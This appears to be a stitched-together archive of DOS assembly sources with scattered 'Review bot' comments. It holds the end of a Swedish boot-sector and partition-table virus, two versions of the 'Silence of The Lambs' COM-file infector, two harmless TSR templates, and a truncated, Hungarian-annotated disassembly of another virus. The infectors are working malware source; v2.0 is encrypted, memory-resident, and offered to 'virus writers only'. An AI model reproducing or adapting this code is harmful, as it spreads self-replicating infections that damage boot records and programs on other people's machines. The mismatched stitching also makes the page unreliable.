test Byte Ptr [bx],01h ; Testa om motorn i A: „r p†..
|
||||
jnz Exit ; Nej,hoppa till gamla int 13h
|
||||
|
||||
call Smitta
|
||||
|
||||
Exit: pop bx
|
||||
pop ax
|
||||
pop ds
|
||||
jmp [Old13h]
|
||||
|
||||
|
||||
Smitta Proc Near
|
||||
push cx
|
||||
push dx
|
||||
push si
|
||||
push di
|
||||
push es
|
||||
|
||||
push cs
|
||||
pop es
|
||||
push cs
|
||||
pop ds
|
||||
|
||||
mov si,0004h ; Max antal f”rs”k.
|
||||
|
||||
Retry: mov ax,0201h ; L„s en sector
|
||||
mov bx,0200h ; L„s hit.
|
||||
mov cx,0001h ; Sp†r 0 Sector 1
|
||||
sub dx,dx ; Sida 0 Drive 0
|
||||
pushf
|
||||
call [Old13h] ; L„s in booten.
|
||||
|
||||
jnc OK
|
||||
|
||||
dec si
|
||||
jz Slut ; Hoppa ur om fel.
|
||||
jmp Retry ; F”rs”k max 4 g†nger.
|
||||
|
||||
|
||||
OK: mov si,0200h
|
||||
sub di,di
|
||||
cld
|
||||
lodsw
|
||||
cmp ax,[di]
|
||||
jne L2
|
||||
lodsw
|
||||
cmp ax,[di+2]
|
||||
jne L2
|
||||
jmp Slut
|
||||
|
||||
L2: mov ax,0301h ; Skriv en sector.
|
||||
mov bx,0200h
|
||||
mov cx,0003h ; Sp†r 0 Sector 3
|
||||
mov dx,0100h ; Sida 1 Drive 0
|
||||
pushf
|
||||
call [Old13h] ; Flytta boot sectorn.
|
||||
|
||||
mov ax,0301h
|
||||
sub bx,bx
|
||||
mov cx,0001h
|
||||
sub dx,dx
|
||||
pushf
|
||||
call [Old13h] ; Skriv ner viruset till booten.
|
||||
|
||||
Slut: pop es
|
||||
pop di
|
||||
pop si
|
||||
pop dx
|
||||
pop cx
|
||||
ret
|
||||
Smitta Endp
|
||||
Int13h Endp
|
||||
|
||||
Init: sub ax,ax
|
||||
mov ds,ax ; Nollar ds f”r att „ndra vect.
|
||||
|
||||
cli
|
||||
mov ss,ax
|
||||
mov sp,7C00h
|
||||
sti ; S„tter upp en ny stack.
|
||||
|
||||
push cs
|
||||
pop es
|
||||
mov di,Offset Old13h
|
||||
mov si,004Ch
|
||||
mov cx,0004h
|
||||
cld
|
||||
rep movsb ; Flytta int 13h vectorn.
|
||||
|
||||
mov bx,0413h
|
||||
mov ax,[bx] ; Minnesstorleken till ax.
|
||||
dec ax
|
||||
dec ax
|
||||
mov [bx],ax ; Reservera plats f”r viruset.
|
||||
|
||||
mov cl,06h
|
||||
shl ax,cl
|
||||
mov es,ax ; Omvandla till segment addres.
|
||||
|
||||
mov Word Ptr TmpVec,Offset Int13h
|
||||
mov Word Ptr TmpVec+2,es
|
||||
push es
|
||||
sub ax,ax
|
||||
mov es,ax
|
||||
push cs
|
||||
pop ds
|
||||
mov si,Offset TmpVec
|
||||
mov di,004Ch
|
||||
mov cx,0004h
|
||||
rep movsb
|
||||
pop es
|
||||
|
||||
sub si,si
|
||||
mov di,si
|
||||
mov cx,0200h ; Hela viruset + lite till.
|
||||
rep movsb
|
||||
|
||||
mov ax,Offset Here
|
||||
push es
|
||||
push ax
|
||||
ret ; Hoppa till viruset.
|
||||
|
||||
Here: sub ax,ax
|
||||
int 13h ; <20>terst„ll driven
|
||||
|
||||
sub ax,ax
|
||||
mov es,ax
|
||||
mov ax,0201h ; L„s en sector funk.
|
||||
mov bx,7C00h ; Hit laddas booten normalt.
|
||||
mov cx,BootPek
|
||||
mov dx,BootPek+2
|
||||
int 13h
|
||||
|
||||
push cs
|
||||
pop es
|
||||
mov ax,0201h
|
||||
mov bx,0200h
|
||||
mov cx,0001h
|
||||
mov dx,0080h
|
||||
int 13h ; L„s in partions tabellen.
|
||||
jc Over
|
||||
push cs
|
||||
pop ds
|
||||
mov si,0200h
|
||||
sub di,di
|
||||
lodsw
|
||||
cmp ax,[di] ; Kolla om den „r smittad.
|
||||
jne HdInf
|
||||
lodsw
|
||||
cmp ax,[di+2]
|
||||
jne HdInf
|
||||
|
||||
Over: mov BootPek,0003h
|
||||
mov BootPek+2,0100h
|
||||
sub bx,bx
|
||||
push bx
|
||||
mov bx,7C00h
|
||||
push bx
|
||||
ret ; K”r den gamla booten.
|
||||
|
||||
HdInf: mov BootPek,0007h
|
||||
mov BootPek+2,0080h
|
||||
|
||||
mov ax,0301h
|
||||
mov bx,0200h
|
||||
mov cx,0007h
|
||||
mov dx,0080h
|
||||
int 13h ; Flytta orgin. part.tabellen.
|
||||
jc Over
|
||||
|
||||
push cs
|
||||
pop ds
|
||||
push cs
|
||||
pop es
|
||||
mov si,03BEh
|
||||
mov di,01BEh
|
||||
mov cx,0042h
|
||||
cld
|
||||
rep movsb ; Kopiera part. data till viruset.
|
||||
|
||||
mov ax,0301h
|
||||
sub bx,bx
|
||||
mov cx,0001h
|
||||
mov dx,0080h
|
||||
int 13h ; Skriv viruset till part. tabellen.
|
||||
|
||||
|
||||
sub ax,ax
|
||||
mov es,ax ; Kolla om msg:et ska skrivas ut.
|
||||
test Byte Ptr es:[046Ch],07h
|
||||
jnz HdInf1
|
||||
|
||||
mov si,Offset Txt ; Detta utf”rs bara om man bootar fr†n
|
||||
cld ; diskett.
|
||||
Foo1: lodsb
|
||||
cmp al,00h
|
||||
je HdInf1
|
||||
mov ah,0Eh
|
||||
sub bx,bx
|
||||
int 10h
|
||||
jmp Foo1
|
||||
|
||||
HdInf1: jmp Over
|
||||
|
||||
|
||||
Slutet Label Byte ; Anv„nds f”r att veta var slutet „r.
|
||||
|
||||
|
||||
Txt db 07h,0Ah,0Dh,'The Swedish Disaster I',0Ah,0Dh,00h
|
||||
|
||||
|
||||
Main Endp
|
||||
Code Ends
|
||||
End
|
||||
|
||||
|
|
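--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1,166 @@
+; Silence of The Lambs v1.0
+; (c) The Chronomancer of Demoralized Youth 1992
+;
+; First version : Thursday 27th of Febuary - 01:50 CET.
+;
+
+org 100h
+jmp short dummy1
+db 'DY'
+dummy1:
+mov cx,(100h-80h)/2 ;save command line on stack
+mov si,80h
+save_parm:
+push [si]
+inc si
+inc si
+loop save_parm
+
+mov ah,4Eh
+xor cx,cx
+mov dx,offset file
+int 21h
+jc nomore
+again:
+cmp byte [9Eh],0FAh
+jae more
+call infect
+more:
+mov ah,4Fh
+int 21h
+jnc again
+nomore:
+mov cx,(100h-80h)/2
+mov si,0FEh
+rest_parm:
+pop [si]
+dec si
+dec si
+loop rest_parm
+
+mov bx,0000h
+eof equ $-2
+jmp bx
+
+file db '*.COM',0
+
+infect:
+mov bx,cs
+mov si,cs
+dec si
+mov ds,si
+cmp byte[0],'Z'
+je ok_mark
+jmp back2
+ok_mark:
+sub word [0003h],pgfsize
+jnc ok_mark2
+jmp back
+ok_mark2:
+mov ax,[0012h]
+sub ax,pgfsize
+push ax
+
+mov ds,bx
+mov ax,4301h
+xor cx,cx
+mov dx,80h+1Eh
+int 21h
+
+mov ax,3D02h
+int 21h
+xchg bx,ax
+
+pop ds
+push ds
+mov cx,total
+xor dx,dx
+mov ah,3Fh
+int 21h
+
+cmp byte [0],'M' ;exe ?
+je close
+cmp byte [0],'Z' ;exe ?
+je close
+cmp word [2],'YD' ;allready infected?
+je close
+
+xor cx,cx
+xor dx,dx
+push cx
+push dx
+mov ax,4202h
+int 21h
+
+add ax,total+100h
+mov cs:word [00FEh],ax
+
+mov ah,40h
+mov cx,total
+xor dx,dx
+int 21h
+
+push cs
+pop ds
+
+mov ah,40h
+mov cx,applen
+mov dx,offset append
+int 21h
+
+mov ax,4200h
+pop dx
+pop cx
+int 21h
+
+push [eof]
+mov ax,word [00FEh]
+mov [eof],ax
+
+mov ah,40h
+mov dx,100h
+mov cx,total
+int 21h
+
+pop [eof]
+close:
+mov ah,3Eh
+int 21h
+back:
+pop ds ;(mov ds,si)
+add word [0003h],pgfsize
+back2:
+push cs
+pop ds
+ret
+
+append:
+call $+3
+pop si
+sub si,3+total
+mov di,100h
+mov cx,total
+rep movsb
+mov ax,100h
+push ax
+ret
+applen equ $-offset append
+
+total equ $-100h ;size
+pgfsize equ ($-100h)/16+2 ;paragraphs needed
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+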
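--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1,322 @@
+; Silence of The Lambs v2.0
+; (c) -=<: DRE/\MER :>=- of Demoralized Youth 1992
+;
+; THIS FILE IS FOR EDUCATION PURPOSES ONLY!
+; PERMISSION IS GRANTED TO SPREAD THE SOURCE
+; TO VIRUS WRITERS *ONLY*. PLEASE DO NOT MAKE
+; ANY MODIFYCATIONS, UNLESS YOU ALSO INCLUDE
+; THE ORIGINAL SOURCE.
+;
+; Assemble With A86
+;
+
+org 100h
+jmp short dummy1
+db 'DY'
+dummy1:
+mov cx,length
+mov si,offset enc_start
+mov ah,0
+enc_key equ $-1
+dummy2:
+sub byte [si],ah
+inc si
+add ah,0
+enc_add equ $-1
+loop dummy2
+enc_start:
+mov ah,2Dh
+mov ch,0FFh
+mov dx,cx
+int 21h
+cmp al,0FFh
+jne nomore
+
+mov ax,cs
+dec ax
+mov ds,ax
+cmp byte [0],'Z'
+jne nomore
+
+mov ax,word [3]
+sub ax,pgfsize
+jc nomore
+sub word [3],pgfsize
+sub word [12h],pgfsize
+
+mov es,word [12h]
+mov si,110h
+mov di,100h
+mov cx,total
+cld
+rep movsb
+
+xor ax,ax
+mov ds,ax
+mov si,84h
+mov di,old21
+movsw
+movsw
+
+cli
+mov word [84h+2],es
+mov word [84h],offset ni21
+sti
+
+nomore:
+push cs
+push cs
+pop es
+pop ds
+
+mov bx,0000h ;return control to the
+eof equ $-2 ;end user
+jmp bx
+
+xclose: jmp close
+
+infect:
+push cs
+pop ds
+push cs
+pop es
+
+db 0E4h,40h
+mov byte [enc_key],al
+
+mov ax,4300h ;use CHMOD to get file attr
+xor dx,dx
+int 21h
+
+mov [0F0h],cx ;store attr in PSP
+
+mov ax,4301h ;clear file attr with CHMOD
+xor cx,cx
+int 21h
+
+mov ax,3D02h ;open file for read / write
+int 21h
+xchg bx,ax
+lahf
+push ax
+mov ax,5700h ;get file date & time
+int 21h
+
+mov [0F2h],cx
+mov [0F4h],dx
+pop ax
+sahf
+jc xclose
+
+mov ah,3Fh ;read from file
+mov cx,total
+mov dx,old
+int 21h
+
+cmp byte [old+0],'M' ;exe MZ ?
+je xclose
+cmp byte [old+0],'Z' ;exe ZM ?
+je xclose
+cmp word [old+2],'YD' ;allready infected?
+je xclose
+
+mov ax,4202h ;lseek to EOF
+xor cx,cx
+xor dx,dx
+int 21h
+
+cmp ah,0FAh
+jae xclose
+cmp ah,4
+jb xclose
+
+add ax,total+100h
+mov word [00F6h],ax
+
+mov ah,40h ;write to EOF
+mov cx,total
+mov dx,old
+
+push cx
+mov al,byte [enc_key]
+mov si,dx
+enc_app:
+xor byte [si],al
+inc si
+loop enc_app
+pop cx
+
+int 21h
+
+mov ah,40h ;write to EOF
+mov cx,applen
+mov dx,offset append
+int 21h
+
+mov ax,4200h ;lseek to beginning of file
+xor cx,cx
+xor dx,dx
+int 21h
+
+push [eof]
+mov ax,word [00F6h]
+mov [eof],ax
+
+mov ah,byte [enc_key]
+db 0E4h,40h
+mov byte [enc_add],al
+mov dl,al
+
+mov si,100h
+mov di,old
+
+cld
+mov cx,offset enc_start-100h
+rep movsb
+
+mov cx,length
+enc:
+lodsb
+add al,ah
+stosb
+add ah,dl
+loop enc
+
+mov ah,40h ;write viral code
+mov dx,old
+mov cx,total
+int 21h
+
+pop [eof]
+close:
+mov ax,5701h
+mov cx,[00F2h]
+mov dx,[00F4h]
+int 21h
+
+mov ah,3Eh ;close file
+int 21h
+
+mov ax,4301h
+mov cx,[00F0h]
+xor dx,dx
+int 21h
+ret
+
+append:
+call $+3 ;replace org bytes
+pop si
+sub si,3+total
+mov di,100h
+mov cx,total
+mov ah,byte [enc_key]
+append_enc:
+lodsb
+xor al,ah
+stosb
+loop append_enc
+
+mov ax,100h ;return IP to 100h when done
+push ax
+
+sub ax,ax ;zero regs
+xor bx,bx
+and cx,cx
+sub dx,dx
+xor si,si
+and di,di
+sub bp,bp
+
+ret
+applen equ $-offset append
+
+ni21:
+pushf
+cmp ah,2Dh
+jne Not_Time
+cmp ch,0FFh
+jne Not_Time
+cmp ch,dh
+jne Not_time
+
+mov Al,0
+popf
+iret
+Not_Time:
+cld
+push ax
+push bx
+push cx
+push dx
+push si
+push di
+push bp
+push es
+push ds
+
+; cmp ah,41h
+; jne Not_Parse
+; mov ah,3Ch
+; cli
+; add sp,18
+; sti
+; popf
+; jmp old21-1
+
+Not_Parse:
+cmp ax,4B00h
+jne Not_Exec
+
+mov si,dx
+push cs
+pop es
+xor di,di
+mov cx,128
+rep movsb
+
+mov ax,3524h
+int 21h
+push es
+push bx
+
+push cs
+pop ds
+
+mov ax,2524h
+mov dx,offset ni24
+int 21h
+
+call infect
+
+pop dx
+pop ds
+mov ax,2524h
+int 21h
+
+Not_Exec:
+pop ds
+pop es
+pop bp
+pop di
+pop si
+pop dx
+pop cx
+pop bx
+pop ax
+popf
+jmp far 0000:0000
+old21 equ $-4
+
+ni24: mov al,0
+iret
+
+db 'The Silence Of The Lambs!$'
+
+total equ $-100h ;size
+pgfsize equ (($*2)/16)+2
+length equ $-offset enc_start
+
+old equ $
+
+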
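--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1,307 @@
+
+; NOTE : This template is for .COM files only do not use for .EXE files!!
+
+
+;
+;
+;
+; Copyright 1986 by Dana Nowell - All rights reserved
+;
+; HISTORY:
+; Version Date Name Description
+; 1.0 11/10/86 dn first cut
+; 1.01 11/21/86 dn Fixed memory allocation bug
+; Added installation message
+;
+
+
+title TSR Template
+
+
+
+NULL equ 00h
+BELL equ 07h ; bell character
+BACKSPACE equ 08h ; backspace character
+TAB equ 09h ; tab character
+LF equ 0ah ; line feed
+F_FEED equ 0ch ; form feed
+CR equ 0dh ; carriage return
+EOF equ 1ah ; ctrl z ( end of file )
+SPACE equ ' ' ; ascii space character
+QUOTE equ '"'
+
+SIGNATURE1 equ 6144h ; used for already
+SIGNATURE2 equ 616eh ; resident check
+
+DOS_INT equ 21h ; DOS function interrupt
+DISP_CHAR equ 02h
+GET_KEY equ 08h
+DOS_SCR_MSG equ 09h
+DOS_SET_INT equ 25h
+DOS_RESIDENT equ 31h
+DOS_GET_INT equ 35h
+DOS_TERMINATE equ 4ch
+DOS_STRING_TERM equ '$'
+
+; Interrupt vectors used
+
+HOOK_INT equ 1ch ; interrupt to be hooked ( timer tick now )
+
+;------------------------------------------------------------------------------
+;
+; MACRO SECTION
+;
+;------------------------------------------------------------------------------
+
+Version_msg macro
+jmp short copyright_end
+
+copyright_msg db CR, LF
+db 'TSR Shell - Version 1.01', CR, LF
+db 'Copyright 1986, Dana Nowell ', CR, LF, CR, LF
+db 'May be distributed without license', CR, LF, '$'
+copyright_end:
+Msg copyright_msg
+endm
+
+
+Msg macro ptr
+
+push dx
+push ax
+
+lea dx, ptr
+mov ah, 09h
+int 21h
+
+pop ax
+pop dx
+
+endm
+
+
+
+
+
+com segment para public 'code'
+assume cs:com, ds:com, es:com
+
+;------------------------------------------------------------------------------
+;
+; note: The PSP occurs at the beginning of the code segment
+; for all programs. In COM files the code seg = data seg
+;
+;------------------------------------------------------------------------------
+
+org 0
+
+psp_start dw ? ; int 20h - possibly a block for unresolved
+; externals during link ?
+
+mem_size dw ? ; size of available memory in paragraphs
+filler db ? ; reserved usually zero
+
+dos_call db ? ; call
+dd ? ; address of dos function handler
+
+term_vector dd ? ; address of dos terminate routine
+break_vector dd ? ; address of dos break routine
+error_vector dd ? ; address of dos error routine
+dos_reserved db 2 dup(?); reserved by dos
+dos_handles db 20 dup(?) ; file handle array
+environ_ptr dw ? ; seg of dos environment ( offset = 0 )
+dos_work db 34 dup(?) ; dos work area
+
+int_21h db ? ; int
+db ? ; 21h
+db ? ; retf ( return far )
+
+reserved dw ? ; reserved by dos
+fcb1_ext db 7 dup(?) ; fcb # 1 extension
+fcb1 db 9 dup(?) ; fcb #1
+fcb2_ext db 7 dup(?) ; fcb # 2 extension
+fcb2 db 20 dup(?) ; fcb #2
+
+;
+; disk transfer area ( dta ) and parameter block occupy the same space
+;
+;
+;dta db 128 dup(?) ; disk transfer area
+
+
+
+param_len db ? ; length of parameter string ( excludes CR )
+parameters db 127 dup(?) ; parameters
+
+;------------------------------------------------------------------------------
+;
+; Note on standard fcb structure :
+;
+; The standard FCB is larger than the size reserved in the PSP if you
+; intend to use to FCB data from the PSP move it to a different location.
+;
+;
+; STANDARD STRUCTURE OF A FILE CONTROL BLOCK
+;
+;
+; extension :
+; offset length description
+; -7 1 extension active flag ( 0ffh = active )
+; -6 5 normally unused should be zeros
+; -1 1 file attribute when extension is active
+; 1 . . . . . . . 1 read-only
+; 2 . . . . . . 1 . hidden
+; 4 . . . . . 1 . . system
+; 8 . . . . 1 . . . volume label
+; 16 . . . 1 . . . . subdirectory
+; 32 . . 1 . . . . . archive
+; 64 . 1 . . . . . . unused
+; 128 1 . . . . . . . unused
+;
+; fcb :
+; offset length description
+; 0 1 special drive number ( 1 byte )
+; 0 = default
+; 1 = a:
+; 2 = b: etc
+; 1 8 filename or device name
+; 9 3 filename extension
+; 12 2 current block number
+; 14 2 record size
+; 16 4 file size in bytes ( dos dir entry at open )
+; 20 2 file date ( bit coded as in dir )
+; 22 10 dos work area
+; 32 1 current record number ( 0 - 127 )
+; 33 4 random record number
+;
+;------------------------------------------------------------------------------
+
+
+
+org 100h ; required for COM file ( skips PSP )
+
+
+start:
+jmp install ; install the demon
+
+;-------------------------------------------------------------------
+;
+; resident data structures go here
+;
+;-------------------------------------------------------------------
+
+old_int dd 0 ; original value of hooked interrupt
+resident1 dw SIGNATURE1
+resident2 dw SIGNATURE2
+
+
+;-------------------------------------------------------------------
+;
+; new interrupt starts here
+;
+;-------------------------------------------------------------------
+
+new_int:
+pushf
+
+sti ; must turn INT on if we're going to use them
+
+;-------------------------------------------------------------------
+;
+; be well behaved and pass control to original int
+;
+;-------------------------------------------------------------------
+
+popf
+pushf
+call dword ptr cs:old_int ; do old interrupt
+
+iret ; bye bye
+
+;------------------------------------------------------------------------------
+;
+; INSTALLATION DATA STRUCTURES AND CODE GO HERE
+;
+; WARNING WARNING WARNING - this area does not exist after installation
+;
+;------------------------------------------------------------------------------
+
+last_resident_byte db 0 ; last resident byte
+resident_flag dw 0 ; am I already resident ? ( 0 = NO )
+
+install_msg db CR, LF, 'Installation Complete', CR, LF, '$'
+
+already_installed_msg db CR, LF
+db 'Already Installed - Installation Aborted'
+db CR, LF, '$'
+
+install proc near
+
+Version_msg
+
+
+mov al, HOOK_INT ; int to hook
+mov ah, DOS_GET_INT ; get int(AL) vector ==> ES+BX
+int DOS_INT ; do the int
+lea si, old_int ; where to put old timer interrupt vector
+mov [si], bx ; save the offset and segment
+mov 2[si], es ; ( es also used in check resident )
+
+call check_resident ; am I already resident ?
+
+cmp resident_flag, 0
+je not_resident
+
+Msg already_installed_msg
+
+mov ah, DOS_TERMINATE ; terminate & stay resident
+mov al, 1 ; return value is 1 (already installed)
+int DOS_INT ; bye-bye
+
+not_resident:
+mov dx, offset new_int ; offset of new timer interrupt
+mov al, HOOK_INT ; timer tick
+mov ah, DOS_SET_INT ; set int(AL) vector from DS+DX
+int DOS_INT ; do the int
+
+; program terminate and stay resident
+
+Msg install_msg ; Display the installation message
+
+mov dx, offset last_resident_byte
+
+mov cl, 4 ; convert to paragraphs required to
+shr dx, cl ; remain resident ( divide by 16 )
+inc dx ; allow for any remainder of division
+
+mov ah, DOS_RESIDENT ; terminate & stay resident
+mov al, 0 ; return value is 0 (good return)
+int DOS_INT ; bye-bye
+
+install endp
+
+
+;
+; Check resident procedure
+; requires es register to contain the segment address of
+; the current location for the interrupt being hooked.
+; use the DOS function 35h to obtain this information.
+;
+
+check_resident proc near
+
+cmp es:resident1, SIGNATURE1
+jne not_res
+cmp es:resident2, SIGNATURE2
+jne not_res
+
+mov resident_flag, 1
+
+not_res:
+ret
+
+check_resident endp
+
+com ends
+end start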
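Review bot: The already-installed exit in `install` is mislabelled: `mov ah, DOS_TERMINATE ; terminate & stay resident` performs a plain exit (function 4Ch) and does not stay resident; the comment was copied from the DOS_RESIDENT exit further down and should read `mov ah, DOS_TERMINATE ; plain exit - the second copy must NOT stay resident`. Also worth documenting at `check_resident`: the signature compare reads `resident1`/`resident2` at a fixed offset in whatever segment currently owns the hooked vector, so the duplicate-install guard only holds while this TSR is the most recent hooker of HOOK_INT; once another program hooks the same vector the check misses and a second copy installs. A one-line comment at `cmp es:resident1, SIGNATURE1` stating that assumption would save the next reader a debugging session.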
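--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1,296 @@
+;*************************************************************
+;** Terminate-but-Stay-Resident **
+;** Original from the "Programmer's Journal" **
+;** Modified by Alroger L. Gomes Jr. **
+;** Any comments/question send message for "Roger Gomes" **
+;** on the PDSE BBS (408)735-7190. Have Fun! **
+;*************************************************************
+; Insert you program on line # 157.
+
+Delay_Count Equ 36 ;36 ticks=approx. 2 seconds
+
+; Locations of BIOS Data needed by the resident program
+
+Bios_Data Segment at 40h
+Org 17h
+Kbd_Status dw ?
+Org 6Ch
+Low_Timer dw ?
+Bios_Data EndS
+
+
+Code Segment
+Assume Cs:Code, Ds:Code, Es:Nothing, Ss:Nothing
+Org 100h
+Entry_Point:
+Jmp Install
+
+Hot_Keys dw 01010B
+This_Time dw ?
+Trig_Time dw ?
+Dos_Busy Label dword
+Dos_Busy_Off dw ?
+Dos_Busy_Seg dw ?
+Criterr_Flag db ?
+
+Already8 db 0
+MenuON db 0
+
+
+;*** Replacement for Int 24h - critical Dos Error ***
+Diverted_Int24:
+Mov Cs:Criterr_Flag,1
+Xor Al,Al
+Iret
+
+Int_24_Vect Label dword
+Int_24_Off dw ?
+Int_24_Seg dw ?
+
+;***** ID CODE *****
+Res_ID1 dw 'Al'
+Res_ID2 dw 'ro'
+Res_ID3 dw 'ge'
+;*******************
+
+;*** Replacement for Int 8 - Timer hardware Interrupt ***
+Diverted_Int8:
+Pushf
+Call_Int8 db 09Ah
+Int_8_Vect Label dword
+Int_8_Off dw ?
+Int_8_Seg dw ?
+
+Cmp Cs:MenuOn,0
+Je MenuNOT
+Iret
+MenuNOT:
+Mov Cs:MenuOn,1
+Push Ds
+Push Bx
+Lds Bx,Cs:Dos_Busy
+Cmp Byte Ptr [Bx],0
+Pop Bx
+Pop Ds
+Mov Cs:MenuOn,0
+Jz Get_Bios_Data
+Dos_is_Busy:
+Iret
+
+;*** Replacement for Int 28 - Generated by Dos, esp. during keyboard I/O ***
+Diverted_Int28:
+Pushf
+Call_Int28 db 09Ah
+Int_28_Vec Label dword
+Int_28_Off dw ?
+Int_28_Seg dw ?
+Cmp Cs:MenuOn,0
+Je Get_Bios_Data
+Iret
+
+Get_Bios_Data:
+Mov Cs:MenuOn,1
+Sti
+Push Ds
+Push Ax
+Mov Ax,Bios_Data
+Mov Ds,Ax
+Assume Ds:Bios_Data
+Mov Ax,Low_Timer
+Mov Cs:This_time,Ax
+Mov Ax,Kbd_Status
+Push Cs
+Pop Ds
+Assume Ds:Code
+Chk_Keys:
+And Ax,Hot_Keys
+Cmp Ax,Hot_Keys
+Jne Back_to_Applic
+Chk_Timer:
+Mov Ax,This_Time
+Cmp Ax,Trig_Time
+Jb Time_is_Right
+Sub Ax,Trig_Time
+Sub Ax,Delay_Count
+Jnc Time_is_Right
+
+Back_to_Applic:
+Pop Ax
+Pop Ds
+Mov Cs:MenuOn,0
+Iret
+
+Time_is_Right:
+Mov Ax,This_Time
+Mov Trig_Time,Ax
+Pop Ax
+Pop Ds
+
+;***************************************************************************
+; This is the Start of the application-dependent resident code
+
+Start_Program:
+Mov Cs:MenuOn,1
+Push Ax
+Push Bx
+Push Cx
+Push Dx
+Push Si
+Push Di
+Push Bp
+Push Ds
+Push Es
+
+Push Cs
+Pop Ds
+
+Mov Ax,3524h
+Int 21h
+Mov Int_24_Off,Bx
+Mov Int_24_Seg,Es
+Mov Ax,2524h
+Mov Dx,Offset Diverted_Int24
+Int 21h
+
+;****************************************************************************
+
+; Insert your program here.
+
+;****************************************************************************
+
+Restore_Int24:
+Lds Dx,Int_24_Vect
+Mov Ax,2524h
+Int 21h
+Pop Es
+Pop Ds
+Pop Bp
+Pop Di
+Pop Si
+Pop Dx
+Pop Cx
+Pop Bx
+Pop Ax
+Mov Cs:MenuOn,0
+Mov Cs:Already8,0
+Iret
+
+; This is the end off the applicant-dependent resident code
+
+End_of_Res Label word
+
+;***************************************************************************
+; Installation
+
+Install:
+Mov Ax,Cs
+Mov Ds,Ax
+Mov Es,Ax
+
+Mov Ah,9
+Mov Dx,OffSet CopyRight
+Int 21h
+
+; Make sure that it is at least Dos 2.00
+Mov Ah,30h
+Int 21h
+Or Al,Al
+Jnz Chk_Vectors
+Mov Dx,Offset BadDos_Msg
+Mov Ah,9
+Int 21h
+Int 20h
+
+; See if resident code is already Installed in Memory
+
+Chk_Vectors:
+Mov Ax,Cs
+Mov Ds,Ax
+Mov Es,Ax
+
+Mov Ax,3508h
+Int 21h
+Cmp Word Ptr [Es:Bx-6],'Al'
+Jne Not_Installed1
+Cmp Word Ptr [Es:Bx-4],'ro'
+Jne Not_Installed1
+Cmp Word Ptr [Es:Bx-2],'ge'
+Jne Not_Installed1
+
+Mov Dx,Offset No_Install_Msg
+Mov Ah,9
+Int 21h
+Mov Ax,4C01h
+Int 21h
+
+Not_Installed1:
+Mov Ax,3577h
+Int 21h
+Mov Ax,Es
+Cmp Ax,'Al'
+Jne Not_Installed
+Cmp Bx,'ro'
+Jne Not_Installed
+
+Mov Dx,Offset No_Install_Msg
+Mov Ah,9
+Int 21h
+Mov Ax,4C01h
+Int 21h
+
+Not_Installed:
+Mov Ax,Cs
+Mov Ds,Ax
+Mov Es,Ax
+
+Push Es
+Mov Ax,Cs
+Mov Ds,Ax
+Mov Es,Ax
+
+Mov Ah,34h
+Int 21h
+Mov Dos_Busy_Off,Bx
+Mov Dos_Busy_Seg,Es
+
+Mov Ax,3508h
+Int 21h
+Mov Int_8_Off,Bx
+Mov Int_8_Seg,Es
+
+Mov Ax,Cs
+Mov Es,Ax
+Mov Ds,Ax
+
+Mov Ax,2508h
+Mov Dx,Offset Diverted_Int8
+Int 21h
+
+Mov Ax,'Al'
+Mov Ds,Ax
+Mov Dx,'ro'
+Mov Ax,2577h
+Int 21h
+Mov Ax,Cs
+Mov Ds,Ax
+
+Mov Ax,3528h
+Int 21h
+Mov Int_28_Off,Bx
+Mov Int_28_Seg,Es
+Mov Ax,2528h
+Mov Dx,Offset Diverted_Int28
+Int 21h
+Pop Es
+
+; Terminate and stay resident
+Mov Dx,Offset Install
+Int 27h
+
+No_Install_Msg db 'xxxx is already in memory!',10,13,10,13,'$'
+BadDos_Msg db 'DOS 2.0 or greater needed!',10,13,10,13,'$'
+CopyRight db 'xxxx by ?????? - yyyy $'
+
+Code EndS
+End Entry_Point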
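Review bot: `Not_Installed:` stores a second presence marker by writing 'Al':'ro' into the INT 77h vector (`Mov Ax,2577h`), so from then on that vector holds a data tag rather than a handler address and any INT 77h raised by a driver or BIOS would jump to a bogus far pointer; the `Res_ID1..Res_ID3` words in front of `Diverted_Int8`, which `Chk_Vectors` already inspects, are a sufficient marker, so the INT 77h write and the `Not_Installed1` re-check can be dropped. Two smaller points: the strings at `No_Install_Msg` and `BadDos_Msg` emit `10,13` (LF then CR) instead of the DOS convention `13,10`, and `Already8` is only ever written (`Mov Cs:Already8,0`), never read, so it should go or carry a comment stating its purpose. `Criterr_Flag` is declared with `?`, set to 1 in `Diverted_Int24` and never cleared or examined in the resident code, so the application section after `Start_Program` should initialise it before relying on it.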
@ -0,0 +1,324 @@
|
|||
@ virus unassembled list:
|
||||
`90.07.21.
|
||||
|
||||
Magyar zat: K”v ri L szl¢
|
||||
Tel.: (41) 21-822 07-13:20 mh.
|
||||
21-033 18:00-
|
||||
|
||||
|
||||
0EB0:0100 E80000 CALL 0103
|
||||
0EB0:0103 90 NOP
|
||||
0EB0:0104 5E POP SI ;SI=IP b zisc¡m
|
||||
0EB0:0105 50 PUSH AX
|
||||
0EB0:0106 51 PUSH CX
|
||||
0EB0:0107 B82135 MOV AX,3521
|
||||
0EB0:010A CD21 INT 21 ;INT 21h c¡m lek‚rdez‚se
|
||||
0EB0:010C 8CC0 MOV AX,ES
|
||||
0EB0:010E 3D0040 CMP AX,4000 ;mem¢ri ban vam ?
|
||||
0EB0:0111 7220 JB 0133 ;nincs nem 4000h f”l‚
|
||||
;mutat!
|
||||
0EB0:0113 83EE03 SUB SI,+03 ;JMP+op hossza
|
||||
0EB0:0116 BA8601 MOV DX,0186 ;eredeti JMP+op cime
|
||||
0EB0:0119 03F2 ADD SI,DX ;b zishoz
|
||||
0EB0:011B 8B1C MOV BX,[SI]
|
||||
0EB0:011D 8B4C02 MOV CX,[SI+02]
|
||||
0EB0:0120 891E0001 MOV [0100],BX ;eredeti JMP+op.
|
||||
0EB0:0124 890E0201 MOV [0102],CX ;visszarak sa
|
||||
0EB0:0128 8CD8 MOV AX,DS
|
||||
0EB0:012A 8EC0 MOV ES,AX ;ES=DS
|
||||
0EB0:012C 59 POP CX
|
||||
0EB0:012D 58 POP AX
|
||||
0EB0:012E BB0001 MOV BX,0100
|
||||
0EB0:0131 FFE3 JMP BX ;ugr s 0100h-ra igy
|
||||
;lefut az eredeti prg.
|
||||
;Ha nincs a mem¢ri ban
|
||||
